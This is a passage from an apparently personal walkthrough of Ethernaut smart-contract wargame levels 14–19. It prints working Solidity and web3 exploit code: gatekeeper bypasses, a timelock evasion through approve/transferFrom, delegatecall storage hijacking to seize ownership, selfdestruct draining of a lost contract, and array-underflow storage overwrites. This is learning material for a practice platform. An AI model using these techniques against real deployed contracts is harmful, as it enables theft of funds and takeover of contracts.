    function enter(bytes8 _gateKey) public gateOne gateTwo gateThree(_gateKey) returns (bool) {
        entrant = tx.origin;
        return true;
    }
}
```

This is similar to the previous level. There are three checks that are made, the first being the same as before, ensuring that we forward the transaction through a deployed contract.

The second check asserts that `extcodesize` of `caller` (which is the same as `msg.sender`) is zero. This is a naive check to try to ensure that the sender of the transaction is *not* a contract, but there's a way around this: `extcodesize` is zero during contract construction, so we just need to make this call during construction.

The third check is another piece of bitwise logic. It takes the hash of the sender, XORs with the gate key, and this needs to be the max value for `uint64`. This max value would be all 1s, so we should be fine submitting a key that is the bitwise `NOT` of the same hash of the attack contract's address. We can actually get the same result by `XOR`ing with all 1s, as they do when the check the key, as the operation that `XOR`s with 1s is the inverse of itself.

The following contract completes the level upon deployment.
```
contract EntrantTwo {
    constructor(address gatekeeperAddress) {
        bytes8 key = bytes8(uint64(bytes8(keccak256(abi.encodePacked(address(this))))) ^ type(uint64).max);
        GatekeeperTwo(gatekeeperAddress).enter(key);
    }
}

```

# Level 15: Naught Coin
```
import "openzeppelin-contracts-08/token/ERC20/ERC20.sol";

contract NaughtCoin is ERC20 {
    // string public constant name = 'NaughtCoin';
    // string public constant symbol = '0x0';
    // uint public constant decimals = 18;
    uint256 public timeLock = block.timestamp + 10 * 365 days;
    uint256 public INITIAL_SUPPLY;
    address public player;

    constructor(address _player) ERC20("NaughtCoin", "0x0") {
        player = _player;
        INITIAL_SUPPLY = 1000000 * (10 ** uint256(decimals()));
        // _totalSupply = INITIAL_SUPPLY;
        // _balances[player] = INITIAL_SUPPLY;
        _mint(player, INITIAL_SUPPLY);
        emit Transfer(address(0), player, INITIAL_SUPPLY);
    }

    function transfer(address _to, uint256 _value) public override lockTokens returns (bool) {
        super.transfer(_to, _value);
    }

    // Prevent the initial owner from transferring tokens until the timelock has passed
    modifier lockTokens() {
        if (msg.sender == player) {
            require(block.timestamp > timeLock);
            _;
        } else {
            _;
        }
    }
}
```

The goal here is to make your own token balance zero. We can see there is a timer locking out the `transfer` method for 10 years, but from a quick look at the ERC20 standard, there is also a `transferFrom` method, where this check is not made. In fact, even if the same check was made in `transferFrom`, this would still be exploitable, as ERC20 allows any token holder to assign an "allowance" to other addresses to manipulate. With this in mind, the timed lockout should either be checking the `from` address rather than `msg.sender`, or also disallow allowances to be updated until the same time has elapsed.

So, for us to complete this level, we must first assign ourselves an allowance of our total balance, and then transfer the tokens to anybody (in this case I sent them to the contract itself) via `transferFrom`. The following two transactions got the job done, via the Ethernaut console.
```
contract.approve(player, "1000000000000000000000000")
contract.transferFrom(player, contract.address, "1000000000000000000000000")
```

# Level 16: Preservation
```
contract Preservation {
    // public library contracts
    address public timeZone1Library;
    address public timeZone2Library;
    address public owner;
    uint256 storedTime;
    // Sets the function signature for delegatecall
    bytes4 constant setTimeSignature = bytes4(keccak256("setTime(uint256)"));

    constructor(address _timeZone1LibraryAddress, address _timeZone2LibraryAddress) {
        timeZone1Library = _timeZone1LibraryAddress;
        timeZone2Library = _timeZone2LibraryAddress;
        owner = msg.sender;
    }

    // set the time for timezone 1
    function setFirstTime(uint256 _timeStamp) public {
        timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
    }

    // set the time for timezone 2
    function setSecondTime(uint256 _timeStamp) public {
        timeZone2Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
    }
}

// Simple library contract to set the time
contract LibraryContract {
    // stores a timestamp
    uint256 storedTime;

    function setTime(uint256 _time) public {
        storedTime = _time;
    }
}
```

The goal here is to take ownership of the contract. This is an interesting one: there is a bug in this implementation that could break all sorts of things, but we can use it to take ownership.

When `delegatecall` is used, the code of another contract is executed with the memory of the first contract. However, this memory is just binary data, and different contracts might view it differently. When we call `setTime` using their simple `LibraryContract` implementation, this updates the field `storedTime`, which is of type `uint256` and is the *only* field this contract has. When this is called via `delegatecall`, `storeTime` in `LibraryContract`'s context is just the first 256 bits in the contract's memory, which in fact maps over the fields `timeZone1Library` and `timeZone2Library`, which take up 160 bits each (because they are the first two fields).

So, if we call `setFirstTime` or `setSecondTime`, and we encode the address of our own contract into the right part of a `uint256` such that it overwrites `timeZone1Library`, then the next time we call `setFirstTime`, the parent contract will `delegatecall` to code that we control, and we will be able to do whatever we want. We will just need to make sure that we have a method that will be callable with the same method ID as `setTime`, so we will give it the same signature.

I implemented the following contract. Note the two state parameters `rubbishData1` and `rubbishData2`. These are there so that when we write to `owner`, it is mapped to the same part of memory as the victim contract `Preservation`'s variable `owner`. Deploying this contract and calling `attack` completed this level.
```
contract TimeWarp {
    address public rubbishData1;
    address public rubbishData2;
    address public owner;

    function attack(address victim) external {
        // make this contract the timeZone1Library
        Preservation(victim).setFirstTime(uint256(uint160(address(this))));
        // make the victim delegateCall back to this contract
        Preservation(victim).setFirstTime(uint256(uint160(msg.sender)));
    }

    // this method pretends to be 'setTime', but actually changes the owner.
    function setTime(uint256 _time) public {
        owner = address(uint160(_time));
    }
}

interface Preservation {
  function setFirstTime ( uint256 _timeStamp ) external;
}
```

# Level 17: Recovery
```
contract Recovery {
    //generate tokens
    function generateToken(string memory _name, uint256 _initialSupply) public {
        new SimpleToken(_name, msg.sender, _initialSupply);
    }
}

contract SimpleToken {
    string public name;
    mapping(address => uint256) public balances;

    // constructor
    constructor(string memory _name, address _creator, uint256 _initialSupply) {
        name = _name;
        balances[_creator] = _initialSupply;
    }

    // collect ether in return for tokens
    receive() external payable {
        balances[msg.sender] = msg.value * 10;
    }

    // allow transfers of tokens
    function transfer(address _to, uint256 _amount) public {
        require(balances[msg.sender] >= _amount);
        balances[msg.sender] = balances[msg.sender] - _amount;
        balances[_to] = _amount;
    }

    // clean up after ourselves
    function destroy(address payable _to) public {
        selfdestruct(_to);
    }
}
```

The idea here is that the contract creator created a new `SimpleToken` contract, sent it some balance, and then lost the address. We need to find the address and take the balance out of it. This looks like it's just going to be a job for block scanners.

Getting a new instance of this level seems to work a little differently. It doesn't advertise the contract address in the console, although the truffleContract `contract` is still available, with an address. I looked up this address on Etherscan, which shows the `Recovery` contracy (althought it doesn't know it by this name), which has two recorded internal transactions.

The first appears to be the contract creation transaction for the `Recovery` contract, and the second must be the contract creation transaction for the `SimpleToken` contract we are looking for. Looking up the address of that contract, we can see it was created and then 0.001 ETH was sent to it, just as the level described.

So now we just need to transfer some balance from that contract. The first thing I did was generate the ABI for the `SimpleToken` contract (there are lots of ways to do this; I used Remix because I already had the tab open). I created a web3js contract as before, and used the `destroy()` method to self-destruct the "lost" contract and send myself the funds. This completed the level.
```
var con = makeContract("[address of lost contract]]", [ABI of SimpleToken]);
con.methods.destroy(player).send()
```

However, after the level was completed, the text given by the level explained how addresses are created deterministically, and it is possible to send funds to an address that does not yet exist, and later receive those funds by creating a contract at that address. This is interesting, but doesn't seem to have anything to do with the way I solved this level. I guess it was just a reasonable place to share that piece of info? Who knows!

# Level 18: MagicNumber

This level requires us to deploy a contract that returns the number 42, in a full-size 32-byte word. The catch is that the code of our contract must be 10 bytes or less.

This is a bit of an insane request if you're compiling Solidity. The Solidity compiler produces bytecode with *a lot* of bookkeeping. For example, the raw bytecode of a contract is always executed from the beginning - the job of selecting which Solidity method to execute involves retrieving the method ID from the calldata and checking it against a number of precompiled constants, and them jumping to the appropriate starting instruction based on which (if any) is matched. This process alone requires bytecode that is already much larger than 10 bytes.

Therefore for us to deploy a contract with less than 10 bytes of runtime bytecode, it will need to be one that does not differentiate between method calls, and we will need to write it in raw bytecode. We just need a snippet of code that always returns 32 bytes encoding the number 42. The following will do exactly that.

```
PUSH1 0x2a // put 42 on the stack
PUSH0      // put 0 on the stack (the memory offset)
MSTORE     // store 42 at offset 0 in memory
PUSH1 0x20 // put 32 on the stack (the return size)
PUSH0      // put 0 on the stack (the return offset)
RETURN     // halt execution and return the first 32 bytes in memory
```

The above is a human-readable view of the bytecode, called a mnemonic. The raw bytecode of the above is `0x602a60005260206000f3`, which is exactly 10 bytes! You can kind of read this directly if you know that `0x60` represents `PUSH1` - you can see the first 4 bytes map *almost* directly to the first two instructions. But there's something funny going on; if we turn this raw bytecode back into into mnemonics, the first four two opcodes look like:
```
PUSH1 0x2a
PUSH1 0x00
```

This is a bit different! `PUSH0` is a relatively new opcode, included since the Shanghai Ethereum upgrade. It seems that the bytecode editor I was using to test my bytecode was actually doing a little bit of *compilation*, rather than simply a direct translation. Since Shanghai, we can replace the two bytes of opcode `6000` (which is `PUSH1 0x00`) with `5f` (which is `PUSH0`). This happens twice in our bytecode above, so we can manually shorten this bytecode even further to `0x602a5f5260205ff3`, which is 8 bytes in size, making this even smaller than the level requires!

Now, what we have written above is the *runtime bytecode* - this is the code that we want the contract to execute when a transaction targets it. However, this isn't quite all we need; to create a contract we need to deploy some *contract creation bytecode*, which is essentially the "constructor", which is just a piece of code that executes and returns the runtime bytecode to be stored on the blockchain.

So we need to write another little piece of bytecode that will simply return `0x602a5f5260205ff3`, which is the following. Note that before returning we push `0x08` and `0x18`, which are the values 8 and 24, which are the size and offset of the code we have just put in memory - our runtime bytecode of length 8 was placed at the *end* of the first 32 bytes of memory, so we need that 24 byte offset so the return value comes from exactly the right part of memory.

```
PUSH8 0x602a5f5260205ff3
PUSH0
MSTORE
PUSH1 0x08
PUSH1 0x18
RETURN
```

Deploying "raw" bytecode is a less common practice, so Remix and other tools don't put that functionality quite as front-and-center. We can still achieve what we need a number of ways though. Here is how I did it in web3js, in the Ethernaut console. The hex string you see in the code below is the bytecode representation of our contract creation mnemonic code above.

```
var con = new web3.eth.Contract([], {data: "0x67602a5f5260205ff35f5260086018f3", from:player});
var solverAddress = (await con.deploy().send())._address;
```

After running this, I looked up the returned address on BlockScout, and I could see that a contract had been created, with runtime bytecode of `0x602a5f5260205ff3`, just as we had hoped for. I could then complete this level with the following.

```
contract.setSolver(solverAddress);
```

> A side note: there is also an opcode called `CODECOPY`, which copies the currently-executing bytecode to memory. This seems like a tool that could be used to write a simple general-purpose bytecode prefix, to turn some runtime bytecode into contract creation bytecode. This feels like a more elegant and scalable solution to the above approach.

# Level 19: Alien Codex
```
pragma solidity ^0.5.0;

import "../helpers/Ownable-05.sol";

contract AlienCodex is Ownable {
    bool public contact;
    bytes32[] public codex;

    modifier contacted() {
        assert(contact);
        _;
    }

    function makeContact() public {
        contact = true;
    }

    function record(bytes32 _content) public contacted {
        codex.push(_content);
    }

    function retract() public contacted {
        codex.length--;
    }

    function revise(uint256 i, bytes32 _content) public contacted {
        codex[i] = _content;
    }
}
```

The first thing I notice looking at this contract is that it specifies the use of an older Solidity compiler version, which suggests that the approach used to attack this contract will have been since patched. Indeed, the vulnerability here takes advantage of array length underflow.

I will briefly explain this exploit here, but I recommend [this article](https://programtheblockchain.com/posts/2018/03/09/understanding-ethereum-smart-contract-storage/) by Steve Marx, who does a great job of explaining in detail how it works.

The first thing we need to think about is how Solidity packs its state variables into storage. This was explored somewhat in the `Delegate` level, but now we need to think about how dynamically-sized variables are allocated.

The first thing we need to know is how Solidity uses its contract storage. Storage being distinct from memory: when we say "memory", we are talking about temporary data created and used during a transaction's execution. When we say "storage", we mean the persistent data that belongs to the deployed contract.

Each contract can store up to 2^256 words, where each word is 32 bytes. We can think of each of these words as being indexed by a number, which we will call the slot number. Slot 0 is the very first word, slot 1 follows, and so on.

The way Solidity allocates storage is mostly very intuitive. Firstly, let's point out that we "inherit" the private variable `_owner` from the `Ownable` contract. This is stored *after* the variables declared directly in `AlienCodex`. In the code for this level, the "first" variable to be stored is `contact`. So `contact` lives in slot 0. After this, we have `codex` in slot 1, but how many slots will `codex` take up, given that its size is likely to change throughout the lifespan of the contract? If there were 150 elements in that array, we can't just put that data in slots 1-151, because we need to place the variable `_owner` somewhere, ideally in slot 2.

Instead Solidity just uses slot 1 for `codex`, where it stores only the *length* of the array, and it stores the *content* of the array consecutively in storage, starting at the slot whose number is the Keccak256 hash of `codex`'s slot number (slot 1).

We can use a web3js helper to calculate this number:
```
web3.utils.soliditySha3Raw(1);
>"0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6" 
```

The above looks like an address, but it's just the hexadecimal representation of the 256 bit number which we will call `x`, produced by Keccak256 (which is sometimes referred to as SHA3, even though they are not quite the same). So the large number there tells us which slot the contents of `codex` will be stored at, starting with `codex[0]`.

So, what happens if we try to write to `codex[1000]`? We will write to the slot in storage whose number is `x + 1000`. And what if `x + 1000` is larger than 2^256-1? It will wrap back around to zero, and start to overwrite the storage in the more "normally" allocated slots. Therefore, we just need to figure out another number `y`, such that `x + y = 2^256`. That number is, obviously, `2^256 - x`. We can use JavaScript's BigInt type to deal with these numbers, as they are too large for regular JavaScript primitives.

```
var x = BigInt(web3.utils.soliditySha3Raw(1));
var limit = BigInt(2) ** BigInt(256);
var y = limit - x;
y.toString(16);
>"4ef1d2ad89edf8c4d91132028e8195cdf30bb4b5053d4f8cd260341d4805f30a"
```

So the large number for `y` should be an index such that if we attempt to write to `codex[y]`, we will write to slot 0.


# Appendix: Freq-used URLs
- [Ethereum Sepolia Faucet](https://cloud.google.com/application/web3/faucet/ethereum/sepolia) - 0.03 SepETH per day.
- [ABI to Solidity Interface Converter](https://bia.is/tools/abi2solidity/) - to make it easier to transact with Level contracts from my own contracts.
- [EVM Codes](https://www.evm.codes/) - for exploring the details of EVM opcodes.